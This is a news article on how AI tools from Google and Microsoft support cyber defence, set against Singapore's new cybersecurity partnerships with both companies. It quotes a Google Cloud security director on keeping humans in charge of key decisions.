While AI has been a source of worry for many cybersecurity professionals, the new technology has already opened up a good number of capabilities that businesses can tap on to deepen and scale up their expertise to ward off attacks in future, say experts.
AI can help identify real threats to human operators facing a deluge of alerts, automatically generate security controls, policies and configurations to beef up security, and even provide timely advice to tackle an ongoing cyber attack, they add.
Earlier this week, the Cyber Security Agency of Singapore inked two separate deals with Google and Microsoft to tap on private expertise for national cyber defence. The cooperation will include threat intelligence sharing, joint operations, technical collaboration and capacity building.
Singapore, together with its counterparts in the South China Sea, were targeted for intelligence collection, according to a Microsoft security report this year.
The Republic was also one of the top 10 countries listed as victims of the cracked versions of Cobalt Strike, which was used by cyber criminals to elevate and enumerate access after compromising a victim’s system.
The collaboration with the Singapore authorities offers a chance to leverage collective capabilities and pursue the adoption of new technologies, including AI, said Microsoft’s corporate vice-president for customer security and trust, Tom Burt.
For example, Microsoft’s Security Copilot, out for a limited preview earlier this year, uses OpenAI’s GPT-4 generative AI to collate insights from various Microsoft products and quickly identify threats for businesses and provide instructions for remediation.
Google, on its part, has also been pushing AI to do more to bolster cybersecurity in businesses as well.
For example, it offers AI-powered remediation and frontline threat intelligence, so human operators do not have to sieve through a load of logs or other information to identify a persistent threat.
Earlier this year, the technology giant also unveiled its Security AI Workbench, which makes use of generative AI models to provide better visibility of cyber threats.
It makes use of the company’s Sec-PaLM, a large language model (LLM) that is tuned for security, according to Google. One way this helps is to give a natural-language explanation or summary of threats so that they can be quickly flagged and neutralised.
The company’s Duet AI assistant, when deployed in a security command centre, will also be able to advise what to do when a threat is found, said Mark Johnston, director of the Office of the CISO at Google Cloud.
This means operators can offer suggestions such as deploying a Web application firewall to counter a distributed denial of service (DDoS) attack or to patch a Log4j vulnerability, he told journalists at an AI workshop in Singapore this week.
With Google’s AI solution, businesses can run simulations to see the outcome of, say, changing the settings on a firewall to block a known threat’s entry point.
Google’s approach is not unlike what Microsoft had introduced earlier, and both still require humans at the wheel. At least for key decisions, an expert needs to approve an action to take.
“AI is not a magic button to secure my website,” said Johnston. “It’s still engineering, not magic.”
[…] enterprise deep tech and AI, which has captured the imagination of late, other areas with great potential include climate […]